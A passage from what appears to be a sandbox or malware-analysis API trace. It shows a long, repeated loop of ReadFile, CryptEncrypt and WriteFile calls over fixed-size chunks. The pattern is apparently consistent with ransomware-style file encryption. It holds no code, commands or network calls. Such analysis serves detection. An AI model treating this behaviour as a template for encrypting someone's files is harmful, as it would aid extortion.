nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.790] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.791] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.791] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.791] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.791] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.791] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.791] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.791] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.791] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.791] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.791] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.791] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.791] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.791] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.791] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.792] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.792] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.792] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.792] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.792] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.792] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.792] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.792] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.792] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.792] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.792] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.792] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.792] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.792] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.793] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.793] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.793] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.793] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.793] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.793] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.793] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.793] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.793] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.793] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.793] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.793] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.793] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.793] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.793] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.794] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.794] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.794] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.794] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.794] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.794] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.794] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.794] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.794] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.794] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.794] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.794] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.794] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.794] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.794] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.795] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.795] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.795] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.795] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.795] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.795] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.795] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.795] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.795] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.795] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.795] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.795] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.795] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.795] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.796] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.796] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.796] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.796] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.796] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.796] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.796] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.796] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.797] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.797] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.797] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.797] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.797] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.797] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.797] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.797] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.797] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.797] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.797] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.797] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.797] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.797] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.798] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.798] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.798] WriteFile (in: hFile=0x5d44, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.798] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0266.798] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0266.798] WriteFile (in: hFile=0x5d44, 